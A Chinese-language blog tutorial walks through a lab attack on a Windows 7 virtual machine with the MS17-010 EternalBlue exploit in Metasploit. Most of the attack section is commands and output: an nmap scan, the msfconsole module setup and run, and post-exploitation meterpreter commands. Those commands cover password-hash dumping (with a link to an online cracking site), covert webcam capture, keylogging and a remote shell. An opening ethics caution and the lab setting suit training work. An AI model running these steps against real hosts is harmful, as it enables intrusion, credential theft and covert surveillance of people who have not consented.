渗透测试实战-漏洞利用MS17-010

发布时间 2023-09-26 01:00:17作者: 大象只为你

★关于道德伦理的忠告★

以下内容摘自《Metasploit渗透测试指南》

作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:

  • 不要进行恶意的攻击;

  • 不要做傻事;

  • 在没有获得书面授权时,不要攻击任何目标;

  • 考虑你的行为将会带来的后果;

  • 如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。

1、实验说明

1.1. 漏洞原理

MS17-010(永恒之蓝)是win 7 系统的漏洞,仅影响windows系统中的SMBv1服务。该漏洞是由于SMBv1内核函数中的缓冲区溢出导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。通过445文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件。可以使用Metasploit和其他渗透测试框架进行利用和测试。

该漏洞易受攻击,且已经公开和广泛利用,建议windows及时进行安全更新 ,避免被攻击。

1.2. 前提条件

攻击者与被攻击者的必须互相ping通,才能开始攻击。使用VMware作为实验环境时,确保同一网段。

1.3. 实验环境

VMware 版本是17

kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系统,IP:192.168.242.6

VMware 安装比较简单,从官网下载安装包后,根据安装引导基本点下一步即可。kali和win7系统如果没有,在文末有获取方式,用VMware打开到kali和win7系统目录下,会看到文件后缀是.vmx直接打开即可,会提示虚拟机已经移动相关的提示,选择复制的那个选项打开。网络适配器选择NAT模式,IP不需要手动设置。

2、实验流程

2.1. 确定可ping通

确定目标win7系统,与kali同一个局域网的主机,kali可ping通win7系统的ip

# ping 请求2次
ping 192.168.242.6 -c 2

# ping 结果是通的,可进行后续操作
PING 192.168.242.6 (192.168.242.6) 56(84) bytes of data.
64 bytes from 192.168.242.6: icmp_seq=1 ttl=128 time=0.607 ms
64 bytes from 192.168.242.6: icmp_seq=2 ttl=128 time=0.428 ms

2.2. 扫描存活IP和端口开放

nmap扫描,nmap -T4 -A -v -Pn 192.168.242.0/24进行全面扫描,扫描网段存活IP,以及端口开放情况

nmap 命令是kali系统自带的命令,不用再额外安装。

扫描结果如下,发现445端口开放着

2.3. MSF终端渗透攻击

进入msfconsole终端,search ms17-010,查找ms17-010渗透攻击模块,进行模糊匹配,探测主机是否存在漏洞,利用use命令选择测试接口exploit/windows/smb/ms17_010_eternalblue,可探查主机是否存在永恒之蓝漏洞,其中 show options是查看要配置的参数情况。

注意:由于kali默认登录的kali账户需要切换管理员权限

# 切换管理员权限,需要输入密码
sudo su

# 输入正确密码后,切换成功
┌──(root?kali)-[/home/kali]
└─# 

# 进入msfconsole终端
msfconsole

# 当看到 msf6 >  就表示模块加载成功了,输入
msf6 > search ms17-010

# 查到相关模块,使用的是exploit/windows/smb/ms17_010_eternalblue,索引号是0
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

# 使用模块0
msf6 > use 0

# 可用使用 show options 查看参数,和载荷,会发现参数其实只要设置一个RHOSTS目标主机ip就可以了,载荷有默认值可以不用设置
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# 设置RHOSTS目标主机ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.242.6

# 开始攻击
run

# 攻击成功,会看到WIN,然后出现meterpreter >

2.4. 后渗透利用

进入meterpreter之后,表示渗透成功,可以执行一些深入利用的操作,可以执行一些后渗透命令:

screenshot //桌面截图
getuid   //查看权限
抓取密码:hashdump   //抓取加密之后的密码
	加密方式:MD5  在线解密网站:https://www.cmd5.com/
拍照:
webcam_list    //查看摄像头
webcam_snap   //通过摄像头拍照
webcam_stream   //通过摄像头开启视频
键盘监听:
ps   //查看windows系统运行进程
migrate -P 进程的PID
keyscan_start  //开始监听
keyscan_dump  //获取监听
keyscan_stop //停止监听
shell  //进入的就是DOS系统  受害者win7的cmd命令行
chcp 65001 //改变编码方式,改乱码
whoami  //查看受害者当前用户及权限
windows系统最高权限:system(系统权限)
从命令行退回meterpreter:exit

2.4.1.命令测试截图

#查看权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# 桌面截图 截图成功保存到kali系统的当前目录下
meterpreter > screenshot
Screenshot saved to: /home/kali/nOPlvAsc.jpeg

# 上传文件 到win7系统,注意目录必须是存在的,否则会上传失败
upload /home/kali/1.jpeg C:\\2.jpeg

# 拍照
# 查看摄像头 , 显示1: Integrated Camera 表示,摄像头可用
meterpreter > webcam_list
1: Integrated Camera 

# 通过摄像头拍照
meterpreter > webcam_snap

# 摄像成功输出结果示例 
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /home/kali/XgjiynAu.jpeg
meterpreter > Running Firefox as root in a regular user's session is not supported.  ($XAUTHORITY is /home/kali/.Xauthority which is owned by kali.)

# 此时需要自己再按enter键继续下一步

2.4.2.拍照功能注意说明

拍照功能需要虚拟机win7系统,右下角的照相机要设置连接如图:

如果是使用我提供的win7系统虚拟机,需要再把一个小工具(MediaCreationTool22H2-win7照相功能.exe)复制到win7双击执行一下,才可实现拍照功能。

3、资料获取

如果需要kali和win7系统虚拟机,进行渗透测试的话,请关注我的公众号:大象只为你,后台回复:虚拟机。文件有些大下载耗时会比较久。